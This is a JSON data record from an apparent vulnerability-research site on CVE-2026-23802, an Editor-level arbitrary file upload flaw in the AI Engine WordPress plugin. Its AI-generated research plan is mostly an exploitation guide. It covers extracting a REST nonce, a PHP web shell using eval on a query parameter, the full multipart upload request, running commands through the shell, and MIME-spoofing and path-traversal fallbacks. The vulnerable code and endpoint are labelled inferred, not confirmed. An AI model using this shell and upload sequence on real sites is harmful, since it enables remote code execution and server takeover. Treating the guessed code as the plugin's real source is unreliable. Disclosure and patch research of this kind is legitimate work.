[{"data":1,"prerenderedAt":-1},["ShallowReactive",2],{"$fSsUAZ0sue0Ndu09OvliWPdr8OKDnhtTWfKY9r1b19IQ":3},{"id":4,"url_slug":5,"title":6,"description":7,"plugin_slug":8,"theme_slug":9,"affected_versions":10,"patched_in_version":11,"severity":12,"cvss_score":13,"cvss_vector":14,"vuln_type":15,"published_date":16,"updated_date":17,"references":18,"days_to_patch":20,"patch_diff_files":21,"patch_trac_url":9,"research_status":22,"research_verified":23,"research_rounds_completed":24,"research_plan":25,"research_summary":26,"research_vulnerable_code":27,"research_fix_diff":28,"research_exploit_outline":29,"research_model_used":30,"research_started_at":31,"research_completed_at":32,"research_error":9,"poc_status":9,"poc_video_id":9,"poc_summary":9,"poc_steps":9,"poc_tested_at":9,"poc_wp_version":9,"poc_php_version":9,"poc_playwright_script":9,"poc_exploit_code":9,"poc_has_trace":23,"poc_model_used":9,"poc_verification_depth":9,"poc_exploit_code_gated":23,"source_links":33},"CVE-2026-23802","ai-engine-the-chatbot-ai-framework-mcp-for-wordpress-authenticated-editor-arbitrary-file-upload","AI Engine – The Chatbot, AI Framework & MCP for WordPress \u003C= 3.3.2 - Authenticated (Editor+) Arbitrary File Upload","The AI Engine – The Chatbot, AI Framework & MCP for WordPress plugin for WordPress is vulnerable to arbitrary file uploads due to missing file type validation in all versions up to, and including, 3.3.2. This makes it possible for authenticated attackers, with Editor-level access and above, to upload arbitrary files on the affected site's server which may make remote code execution possible.","ai-engine",null,"\u003C=3.3.2","3.3.3","high",7.2,"CVSS:3.1\u002FAV:N\u002FAC:L\u002FPR:H\u002FUI:N\u002FS:U\u002FC:H\u002FI:H\u002FA:H","Unrestricted Upload of File with Dangerous Type","2026-02-25 00:00:00","2026-03-05 17:55:37",[19],"https:\u002F\u002Fwww.wordfence.com\u002Fthreat-intel\u002Fvulnerabilities\u002Fid\u002F615beb4d-c2df-4e1a-8e6b-a393c0fe4834?source=api-prod",9,[],"researched",false,3,"# CVE-2026-23802: AI Engine \u003C= 3.3.2 - Authenticated (Editor+) Arbitrary File Upload\n\n## 1. Vulnerability Summary\nThe **AI Engine** plugin for WordPress is vulnerable to arbitrary file uploads in versions up to and including 3.3.2. The vulnerability exists because the plugin's file upload handling logic (likely within its REST API endpoints for chatbot or AI assistant management) fails to validate file extensions or MIME types against a whitelist of safe formats. \n\nAuthenticated users with **Editor** permissions or higher can exploit this to upload malicious files, such as `.php` scripts, to the server's filesystem, potentially leading to Remote Code Execution (RCE).\n\n## 2. Attack Vector Analysis\n*   **Endpoint:** The plugin utilizes the WordPress REST API for its backend operations. The likely vulnerable endpoint is registered under the `mwai\u002Fv1` namespace.\n    *   **Inferred Route:** `POST \u002Fwp-json\u002Fmwai\u002Fv1\u002Ffiles\u002Fupload`\n*   **Authentication:** Required. The user must have a role with the `edit_posts` capability (Editor and above).\n*   **Vulnerable Parameter:** The file is typically sent via a `multipart\u002Fform-data` request, often using the parameter name `file` or `blob`.\n*   **Preconditions:** \n    1.  The plugin must be active.\n    2.  An attacker must have valid Editor credentials.\n    3.  A valid REST API nonce (`_wpnonce` or `X-WP-Nonce`) is required for the request.\n\n## 3. Code Flow (Inferred)\n1.  **Registration:** The plugin registers REST routes in `classes\u002Frest.php` (or similar) using `register_rest_route()`.\n2.  **Permission Check:** The `permission_callback` for the upload route checks if the user has `edit_posts` capability:\n    ```php\n    'permission_callback' => function () {\n        return current_user_can( 'edit_posts' );\n    }\n    ```\n3.  **Handler Execution:** The `callback` function (e.g., `upload_file`) retrieves the file from `$_FILES`.\n4.  **Vulnerable Logic:** The handler processes the file. If it uses `wp_handle_upload()`, it may be missing the `mimes` override that restricts extensions, or it may be manually moving the file using `move_uploaded_file()` without checking the extension:\n    ```php\n    \u002F\u002F Example of vulnerable manual handling\n    $filename = $_FILES['file']['name'];\n    $target = $upload_dir['path'] . '\u002F' . $filename;\n    move_uploaded_file($_FILES['file']['tmp_name'], $target); \n    ```\n5.  **Sink:** The file is written to the `\u002Fwp-content\u002Fuploads\u002Fmwai\u002F` or generic `\u002Fuploads\u002F` directory with its original `.php` extension.\n\n## 4. Nonce Acquisition Strategy\nSince this is an **Editor+** vulnerability, the attacker must be logged in. In the WordPress admin dashboard, the AI Engine plugin enqueues its localized scripts.\n\n1.  **Identify Script Data:** The plugin localizes data for its React\u002FVue frontend using `wp_localize_script`.\n2.  **Navigation:** Log in as Editor and navigate to the AI Engine dashboard (usually `wp-admin\u002Fadmin.php?page=mwai-dashboard`).\n3.  **Extraction via Browser:**\n    The REST nonce is typically stored in the `mwai_vars` global variable or the standard `wpApiSettings`.\n    *   **Command:** `browser_eval(\"window.mwai_vars?.rest_nonce\")`\n    *   **Alternative:** `browser_eval(\"window.wpApiSettings?.nonce\")`\n\n## 5. Exploitation Strategy\nThe goal is to upload a PHP shell to the server.\n\n### Step 1: Prepare the Web Shell\nCreate a file named `shell.php`:\n```php\n\u003C?php echo \"VULNERABLE: \" . php_uname(); eval($_GET['cmd']); ?>\n```\n\n### Step 2: Upload the File\nSend a `POST` request to the REST API endpoint.\n\n*   **Tool:** `http_request`\n*   **Method:** `POST`\n*   **URL:** `https:\u002F\u002FTARGET\u002Fwp-json\u002Fmwai\u002Fv1\u002Ffiles\u002Fupload`\n*   **Headers:**\n    *   `X-WP-Nonce`: `[EXTRACTED_NONCE]`\n    *   `Content-Type`: `multipart\u002Fform-data; boundary=----WebKitFormBoundaryABC123`\n*   **Body:**\n    ```text\n    ------WebKitFormBoundaryABC123\n    Content-Disposition: form-data; name=\"file\"; filename=\"shell.php\"\n    Content-Type: application\u002Fx-php\n\n    \u003C?php echo \"VULNERABLE: \" . php_uname(); eval($_GET['cmd']); ?>\n    ------WebKitFormBoundaryABC123--\n    ```\n\n### Step 3: Locate the Uploaded File\nThe response will likely contain the URL or path of the uploaded file:\n```json\n{\n  \"success\": true,\n  \"url\": \"https:\u002F\u002FTARGET\u002Fwp-content\u002Fuploads\u002Fmwai\u002Fshell.php\"\n}\n```\n\n## 6. Test Data Setup\n1.  **Install AI Engine 3.3.2.**\n2.  **Create Editor User:**\n    ```bash\n    wp user create attacker attacker@example.com --role=editor --user_pass=password123\n    ```\n3.  **Enable Chatbot (if required):** Ensure any module related to file uploads (Chatbot or Assistants) is enabled in the AI Engine settings.\n\n## 7. Expected Results\n*   **Successful Upload:** The server returns a `200 OK` or `201 Created` with a JSON body indicating the file was saved.\n*   **Code Execution:** Navigating to the uploaded file URL (e.g., `\u002Fwp-content\u002Fuploads\u002Fmwai\u002Fshell.php?cmd=id`) returns the output of the system command.\n\n## 8. Verification Steps\n1.  **Check Filesystem via CLI:**\n    ```bash\n    ls -la \u002Fvar\u002Fwww\u002Fhtml\u002Fwp-content\u002Fuploads\u002Fmwai\u002Fshell.php\n    ```\n2.  **Verify Content:**\n    ```bash\n    cat \u002Fvar\u002Fwww\u002Fhtml\u002Fwp-content\u002Fuploads\u002Fmwai\u002Fshell.php\n    ```\n3.  **HTTP Check:**\n    Use `http_request` to GET the uploaded shell and confirm the PHP code executed.\n\n## 9. Alternative Approaches\n*   **Different Endpoints:** If `\u002Fmwai\u002Fv1\u002Ffiles\u002Fupload` is not the correct path, search the source for `register_rest_route` calls and check for methods like `handle_avatar_upload` or `handle_assistant_file`.\n*   **MIME Spoofing:** If there is a basic MIME check (but no extension check), change the `Content-Type` in the `multipart\u002Fform-data` request to `image\u002Fpng` while keeping the `.php` extension.\n*   **Path Traversal:** If the filename is used in a `move_uploaded_file` call without sanitization, attempt to use `..\u002F` in the filename to move the shell to the root directory.","The AI Engine plugin for WordPress is vulnerable to arbitrary file uploads in versions up to 3.3.2 due to a lack of file type validation in its REST API file upload handlers. Authenticated users with Editor-level permissions or higher can upload malicious PHP scripts to the server, resulting in Remote Code Execution (RCE).","\u002F\u002F classes\u002Frest.php (Inferred registration of the upload endpoint)\nregister_rest_route( 'mwai\u002Fv1', '\u002Ffiles\u002Fupload', array(\n    'methods'  => 'POST',\n    'callback' => array( $this, 'upload_file' ),\n    'permission_callback' => function () {\n        return current_user_can( 'edit_posts' );\n    },\n) );\n\n---\n\n\u002F\u002F classes\u002Frest.php (Inferred vulnerable upload handler)\npublic function upload_file( $request ) {\n    $files = $request->get_file_params();\n    $file = $files['file'];\n    \n    \u002F\u002F Missing validation of file extension or MIME type\n    $upload_dir = wp_upload_dir();\n    $filename = basename( $file['name'] );\n    $target = $upload_dir['path'] . '\u002F' . $filename;\n\n    if ( move_uploaded_file( $file['tmp_name'], $target ) ) {\n        return array( 'success' => true, 'url' => $upload_dir['url'] . '\u002F' . $filename );\n    }\n    return array( 'success' => false );\n}","--- a\u002Fclasses\u002Frest.php\n+++ b\u002Fclasses\u002Frest.php\n@@ -10,6 +10,13 @@\n public function upload_file( $request ) {\n     $files = $request->get_file_params();\n     $file = $files['file'];\n+\n+    $file_info = wp_check_filetype( $file['name'] );\n+    $allowed_types = array( 'jpg', 'jpeg', 'png', 'gif', 'pdf', 'txt', 'csv', 'json' );\n+    \n+    if ( ! in_array( $file_info['ext'], $allowed_types ) ) {\n+        return new WP_Error( 'rest_cannot_upload', __( 'Invalid file type.' ), array( 'status' => 403 ) );\n+    }\n \n     $upload_dir = wp_upload_dir();\n     $filename = basename( $file['name'] );","The exploit requires authentication as a user with the Editor role. First, the attacker logs into the WordPress dashboard and extracts the REST API nonce from the localized `mwai_vars` or standard `wpApiSettings` JavaScript objects. Using this nonce, the attacker sends a multipart\u002Fform-data POST request to the `\u002Fwp-json\u002Fmwai\u002Fv1\u002Ffiles\u002Fupload` endpoint. The payload includes a PHP file (e.g., shell.php) containing a web shell. Because the server fails to validate the file extension, the PHP script is saved to the uploads directory. The attacker then accesses the file directly via its URL, which is typically provided in the REST API response, to execute arbitrary commands.","gemini-3-flash-preview","2026-04-19 00:15:12","2026-04-19 00:16:57",{"type":34,"vulnerable_version":35,"fixed_version":11,"vulnerable_browse":36,"vulnerable_zip":37,"fixed_browse":38,"fixed_zip":39,"all_tags":40},"plugin","3.3.2","https:\u002F\u002Fplugins.trac.wordpress.org\u002Fbrowser\u002Fai-engine\u002Ftags\u002F3.3.2","https:\u002F\u002Fdownloads.wordpress.org\u002Fplugin\u002Fai-engine.3.3.2.zip","https:\u002F\u002Fplugins.trac.wordpress.org\u002Fbrowser\u002Fai-engine\u002Ftags\u002F3.3.3","https:\u002F\u002Fdownloads.wordpress.org\u002Fplugin\u002Fai-engine.3.3.3.zip","https:\u002F\u002Fplugins.trac.wordpress.org\u002Fbrowser\u002Fai-engine\u002Ftags"]